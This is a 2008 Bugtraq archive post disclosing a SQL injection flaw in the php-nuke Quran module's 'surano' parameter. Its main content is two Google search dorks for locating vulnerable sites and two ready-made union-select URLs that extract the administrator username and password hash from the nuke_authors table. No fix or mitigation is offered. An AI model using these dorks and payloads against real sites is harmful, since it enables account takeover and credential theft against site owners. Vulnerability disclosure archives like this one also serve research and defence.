Bugtraq mailing list archives

php-nuke Quran SQL Injection(surano)


From: hackturkiye.hackturkiye () gmail com
Date: 23 Feb 2008 13:31:32 -0000

###############################################################
# 
#   php-nuke Quran SQL Injection(surano)
#
###############################################################
#
# AUTHOR : S@BUN 
#
# HOME : http://www.milw0rm.com/author/1334
#   
# MAİL : hackturkiye.hackturkiye () gmail com
#        
################################################################
# 
#  DORK 1 : allinurl:  "modules php name Quran"surano
# 
#  DORK 2 : allinurl:  "modules php name Quran"
#
################################################################
   EXPLOIT : 

admin  

modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,aid,222,333,444/**/from/**/nuke_authors/*where%20admin1

pass

modules.php?name=Quran&action=viewayat&surano=-9999/**/union/**/select/**/000,pwd,222,333,444/**/from/**/nuke_authors/*where%20admin1


################################################################
# S@BUN           i AM NOT HACKER      S@BUN 
################################################################


Current thread: